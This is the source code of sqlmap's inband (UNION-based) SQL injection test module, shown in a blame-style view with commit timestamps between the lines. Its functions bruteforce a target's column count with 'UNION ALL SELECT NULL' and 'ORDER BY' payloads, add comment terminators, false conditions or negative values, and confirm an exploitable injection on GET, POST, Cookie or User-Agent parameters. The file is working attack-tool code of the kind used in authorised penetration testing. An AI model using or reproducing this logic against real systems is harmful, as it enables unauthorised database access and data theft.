2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
|
|
|
2010-03-03 18:26:27 +03:00
|
|
|
Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
2009-04-22 15:48:07 +04:00
|
|
|
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
sqlmap is free software; you can redistribute it and/or modify it under
|
|
|
|
the terms of the GNU General Public License as published by the Free
|
|
|
|
Software Foundation version 2 of the License.
|
|
|
|
|
|
|
|
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
|
|
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
|
|
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
|
|
details.
|
|
|
|
|
|
|
|
You should have received a copy of the GNU General Public License along
|
|
|
|
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
|
|
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
|
|
"""
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import randomStr
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2008-12-02 02:09:07 +03:00
|
|
|
from lib.core.data import queries
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.session import setUnion
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.parse.html import htmlParser
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
def __forgeUserFriendlyValue(payload):
|
|
|
|
value = ""
|
|
|
|
|
|
|
|
if kb.injPlace == "GET":
|
|
|
|
value = "%s?%s" % (conf.url, payload)
|
|
|
|
elif kb.injPlace == "POST":
|
|
|
|
value = "URL:\t'%s'" % conf.url
|
|
|
|
value += "\nPOST:\t'%s'\n" % payload
|
|
|
|
elif kb.injPlace == "Cookie":
|
|
|
|
value = "URL:\t'%s'" % conf.url
|
|
|
|
value += "\nCookie:\t'%s'\n" % payload
|
|
|
|
elif kb.injPlace == "User-Agent":
|
|
|
|
value = "URL:\t\t'%s'" % conf.url
|
|
|
|
value += "\nUser-Agent:\t'%s'\n" % payload
|
|
|
|
|
|
|
|
return value
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __unionPosition(negative=False, falseCond=False):
|
2010-03-22 18:39:29 +03:00
|
|
|
value = None
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if negative or falseCond:
|
|
|
|
negLogMsg = "partial (single entry)"
|
|
|
|
else:
|
|
|
|
negLogMsg = "full"
|
|
|
|
|
|
|
|
infoMsg = "confirming %s inband sql injection on parameter " % negLogMsg
|
|
|
|
infoMsg += "'%s'" % kb.injParameter
|
|
|
|
|
|
|
|
if negative:
|
|
|
|
infoMsg += " with negative parameter value"
|
|
|
|
elif falseCond:
|
|
|
|
infoMsg += " by appending a false condition after the parameter value"
|
|
|
|
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
# For each column of the table (# of NULL) perform a request using
|
|
|
|
# the UNION ALL SELECT statement to test it the target url is
|
|
|
|
# affected by an exploitable inband SQL injection vulnerability
|
|
|
|
for exprPosition in range(0, kb.unionCount):
|
|
|
|
# Prepare expression with delimiters
|
|
|
|
randQuery = randomStr()
|
|
|
|
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
|
|
|
|
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
|
|
|
|
|
|
|
|
# Forge the inband SQL injection request
|
|
|
|
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
|
|
|
|
payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
|
|
|
|
|
|
|
|
# Perform the request
|
|
|
|
resultPage, _ = Request.queryPage(payload, content=True)
|
|
|
|
|
|
|
|
# We have to assure that the randQuery value is not within the
|
|
|
|
# HTML code of the result page because, for instance, it is there
|
|
|
|
# when the query is wrong and the back-end DBMS is Microsoft SQL
|
|
|
|
# server
|
|
|
|
htmlParsed = htmlParser(resultPage)
|
|
|
|
|
2010-09-13 19:22:29 +04:00
|
|
|
if resultPage and randQuery in resultPage and not htmlParsed:
|
2009-04-22 15:48:07 +04:00
|
|
|
setUnion(position=exprPosition)
|
2010-03-22 18:39:29 +03:00
|
|
|
value = __forgeUserFriendlyValue(payload)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
if isinstance(kb.unionPosition, int):
|
|
|
|
infoMsg = "the target url is affected by an exploitable "
|
|
|
|
infoMsg += "%s inband sql injection vulnerability" % negLogMsg
|
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
|
|
|
warnMsg = "the target url is not affected by an exploitable "
|
|
|
|
warnMsg += "%s inband sql injection vulnerability" % negLogMsg
|
|
|
|
|
|
|
|
if negLogMsg == "partial":
|
|
|
|
warnMsg += ", sqlmap will retrieve the query output "
|
|
|
|
warnMsg += "through blind sql injection technique"
|
|
|
|
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
return value
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def __unionConfirm():
|
2010-03-22 18:39:29 +03:00
|
|
|
value = None
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
# Confirm the inband SQL injection and get the exact column
|
|
|
|
# position
|
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-03-22 18:39:29 +03:00
|
|
|
value = __unionPosition()
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# Assure that the above function found the exploitable full inband
|
|
|
|
# SQL injection position
|
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-03-22 18:39:29 +03:00
|
|
|
value = __unionPosition(falseCond=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# Assure that the above function found the exploitable partial
|
|
|
|
# (single entry) inband SQL injection position by appending
|
|
|
|
# a false condition after the parameter value
|
|
|
|
if not isinstance(kb.unionPosition, int):
|
2010-03-22 18:39:29 +03:00
|
|
|
value = __unionPosition(negative=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
# Assure that the above function found the exploitable partial
|
|
|
|
# (single entry) inband SQL injection position with negative
|
|
|
|
# parameter value
|
|
|
|
if not isinstance(kb.unionPosition, int):
|
|
|
|
return
|
|
|
|
else:
|
2010-03-22 18:39:29 +03:00
|
|
|
setUnion(negative=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-03-22 18:39:29 +03:00
|
|
|
setUnion(falseCond=True)
|
2008-12-22 00:39:53 +03:00
|
|
|
|
|
|
|
return value
|
|
|
|
|
|
|
|
def __unionTestByNULLBruteforce(comment):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
This method tests if the target url is affected by an inband
|
|
|
|
SQL injection vulnerability. The test is done up to 50 columns
|
|
|
|
on the target database table
|
|
|
|
"""
|
|
|
|
|
2008-12-22 00:39:53 +03:00
|
|
|
columns = None
|
|
|
|
query = agent.prefixQuery(" UNION ALL SELECT NULL")
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
for count in range(0, 50):
|
|
|
|
if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
|
|
|
|
query = query[:-len(" FROM DUAL")]
|
|
|
|
|
|
|
|
if count:
|
|
|
|
query += ", NULL"
|
|
|
|
|
|
|
|
if kb.dbms == "Oracle":
|
|
|
|
query += " FROM DUAL"
|
|
|
|
|
|
|
|
commentedQuery = agent.postfixQuery(query, comment)
|
2008-12-22 00:39:53 +03:00
|
|
|
payload = agent.payload(newValue=commentedQuery)
|
|
|
|
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-22 00:39:53 +03:00
|
|
|
if seqMatcher >= 0.6:
|
|
|
|
columns = count + 1
|
|
|
|
|
|
|
|
break
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
return columns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-22 00:39:53 +03:00
|
|
|
def __unionTestByOrderBy(comment):
|
2009-04-28 03:05:11 +04:00
|
|
|
columns = None
|
|
|
|
prevPayload = ""
|
2008-12-22 00:39:53 +03:00
|
|
|
|
|
|
|
for count in range(1, 51):
|
|
|
|
query = agent.prefixQuery(" ORDER BY %d" % count)
|
|
|
|
orderByQuery = agent.postfixQuery(query, comment)
|
|
|
|
payload = agent.payload(newValue=orderByQuery)
|
|
|
|
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
|
|
|
|
|
|
|
if seqMatcher >= 0.6:
|
|
|
|
columns = count
|
2008-12-29 21:48:23 +03:00
|
|
|
|
2008-12-22 00:39:53 +03:00
|
|
|
elif columns:
|
|
|
|
break
|
|
|
|
|
|
|
|
prevPayload = payload
|
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
return columns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def unionTest():
|
|
|
|
"""
|
|
|
|
This method tests if the target url is affected by an inband
|
|
|
|
SQL injection vulnerability. The test is done up to 3*50 times
|
|
|
|
"""
|
|
|
|
|
2010-03-27 02:23:25 +03:00
|
|
|
if conf.direct:
|
|
|
|
return
|
|
|
|
|
2010-05-19 18:21:59 +04:00
|
|
|
if kb.unionCount is not None and kb.unionPosition is not None:
|
|
|
|
return
|
|
|
|
|
2008-12-29 21:48:23 +03:00
|
|
|
if conf.uTech == "orderby":
|
|
|
|
technique = "ORDER BY clause bruteforcing"
|
2008-12-22 00:39:53 +03:00
|
|
|
else:
|
|
|
|
technique = "NULL bruteforcing"
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
infoMsg = "testing inband sql injection on parameter "
|
2010-01-15 20:42:46 +03:00
|
|
|
infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
value = None
|
2008-12-22 00:39:53 +03:00
|
|
|
columns = None
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-03 00:56:23 +03:00
|
|
|
for comment in (queries[kb.dbms].comment, ""):
|
2008-12-29 21:48:23 +03:00
|
|
|
if conf.uTech == "orderby":
|
2010-03-22 18:39:29 +03:00
|
|
|
columns = __unionTestByOrderBy(comment)
|
2008-12-22 00:39:53 +03:00
|
|
|
else:
|
2010-03-22 18:39:29 +03:00
|
|
|
columns = __unionTestByNULLBruteforce(comment)
|
2008-12-22 00:39:53 +03:00
|
|
|
|
|
|
|
if columns:
|
2010-03-22 18:39:29 +03:00
|
|
|
setUnion(comment=comment, count=columns)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
if kb.unionCount:
|
2010-03-22 18:39:29 +03:00
|
|
|
value = __unionConfirm()
|
2008-10-15 19:38:22 +04:00
|
|
|
else:
|
|
|
|
warnMsg = "the target url is not affected by an "
|
|
|
|
warnMsg += "inband sql injection vulnerability"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
if value is None:
|
|
|
|
value = ""
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
return value
|